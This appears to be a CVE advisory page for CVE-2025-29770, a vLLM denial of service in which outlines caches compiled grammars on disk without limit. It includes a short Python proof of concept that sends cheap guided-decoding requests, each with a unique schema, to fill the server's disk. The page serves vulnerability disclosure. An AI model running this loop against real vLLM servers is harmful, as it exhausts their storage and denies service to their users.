vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends vLLM uses to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem; this cache has been enabled by default in vLLM, and outlines is available by default through the OpenAI-compatible API server. The affected code, vllm/model_executor/guided_decoding/outlines_logits_processors.py, unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests, each with a unique schema, so that every request adds a new entry to the cache. This can result in a denial of service if the filesystem runs out of space. Note that even if vLLM is configured to use a different backend by default, outlines can still be chosen on a per-request basis via the guided_decoding_backend key of the request's extra_body field. This issue applies only to the V0 engine and is fixed in 0.8.0.
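The per-request backend selection is the key exposure. Below is a minimal sketch of the request shape, assuming a vLLM OpenAI-compatible server at http://localhost:8000/v1; the model name, prompt, and schema contents are illustrative placeholders, not taken from the advisory. Each request supplies a unique JSON schema via vLLM's guided_json extension, so before 0.8.0 every request forced outlines to compile and cache a new grammar on disk.

# Minimal sketch, assuming a vLLM OpenAI-compatible server on localhost:8000.
# The model name and schema are hypothetical; guided_decoding_backend is the
# per-request backend key named in the advisory, guided_json is vLLM's
# JSON-schema guided decoding extension.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

def unique_schema(i: int) -> dict:
    # Varying the property name makes each schema unique, so the compiled
    # grammar can never be served from the cache and a new entry is written.
    return {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }

for i in range(3):  # an attacker would simply loop indefinitely
    client.chat.completions.create(
        model="placeholder-model",
        messages=[{"role": "user", "content": "hi"}],
        max_tokens=1,  # a very short decode keeps each request cheap
        extra_body={
            "guided_decoding_backend": "outlines",  # per-request backend choice
            "guided_json": unique_schema(i),
        },
    )

Each iteration is cheap for the client (max_tokens=1) but adds a never-reused entry to the server's on-disk grammar cache, which is what makes the unbounded growth practical.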
History

Thu, 20 Mar 2025 14:00:00 +0000

References updated
Metrics: threat_severity changed from None to Moderate


Wed, 19 Mar 2025 21:15:00 +0000

Metrics: ssvc added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 19 Mar 2025 15:45:00 +0000

Description added (full text as above)
Title added: vLLM denial of service via outlines unbounded cache on disk
Weaknesses added: CWE-770
References updated
Metrics: cvssV3_1 added: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2025-03-19T15:31:00.403Z

Updated: 2025-03-19T20:15:47.505Z

Reserved: 2025-03-11T14:23:00.474Z

Link: CVE-2025-29770

Vulnrichment

Updated: 2025-03-19T20:15:43.284Z

NVD

Status: Received

Published: 2025-03-19T16:15:31.977

Modified: 2025-03-19T16:15:31.977

Link: CVE-2025-29770

Redhat

Severity: Moderate

Public Date: 2025-03-19T15:31:00Z

Links: CVE-2025-29770 - Bugzilla